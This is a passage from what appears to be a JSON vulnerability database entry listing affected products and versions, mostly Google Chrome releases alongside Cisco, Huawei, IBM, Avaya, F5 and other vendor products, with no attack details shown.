"vendor": "google", "version": "5.0.375.59" }, { "model": "dc health check", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.85" }, { "model": "enterprise linux long life 5.9.server", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.111" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7855" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.647.0" }, { "model": "uma v200r001c00spc202", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.937.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.26" }, { "model": "gaia embedded r75", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor s5800t v200r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.71" }, { "model": "gss 4492r global site selector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.30" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.136" }, { "model": "t510 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.867.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.120" }, { "model": "gaia r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.329" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.25" }, { "model": "rack server rh2285 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.746.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.70" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.1" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.753.0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1038.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.7" }, { "model": "nvs v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.496.0" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.728.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.706.0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.824.0" }, { "model": "2054-e07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.28" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.0" }, { "model": "unstructured data identification and mgmt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.35" }, { "model": "ipso r71.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.585.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.68" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "e6000 blade server bh640 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.557.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.91" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.15" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.549.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.1" }, { "model": "boot attestation service", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "vcloud director appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "global threat intelligence proxy", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.207" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.440.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.343.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1053.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.957.0" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.573.0" }, { "model": "high-density server dh320 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1055" }, { "model": "espace dcm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.806.0" }, { "model": "enterprise linux server eus 6.4.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.863.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.652.0" }, { "model": "oceanstor s2600t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.5" }, { "model": "exalytics", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.952.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "secureplatform r75.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1019" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.872.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.57" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1022.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.341.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.11" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.223" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1657.0" }, { "model": "espace ums v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1273.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1274.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.0" }, { "model": "oceanstor s6800e v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1303.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1015" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.714.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.8" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.13" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.6" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.150" }, { "model": "secureplatform r70.1", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.230" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.942.0" }, { "model": "gaia embedded r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.4" }, { "model": "aura application server sip core pb19", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "oceanstor s5600t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.49" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.7" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.128" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.720.0" }, { "model": "healthanalyzer", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.904.0" }, { "model": "gaia r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.212" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.4" }, { "model": "oceanstor s5900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.55" }, { "model": "strm/jsa", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.22" }, { "model": "autobackup server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1052.0" }, { "model": "videoscape conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.305.0" }, { "model": "high-density server xh310 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1034" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.145" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.646.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.697.0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.222" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.593.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.2" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.41" }, { "model": "quantum virtualized packet core", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.7" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.120" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.100" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.20" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.339.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.626.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1031.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.80" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.708.0" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.559.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.625.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.64" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "e9000 blade server ch240 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor 9000e v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 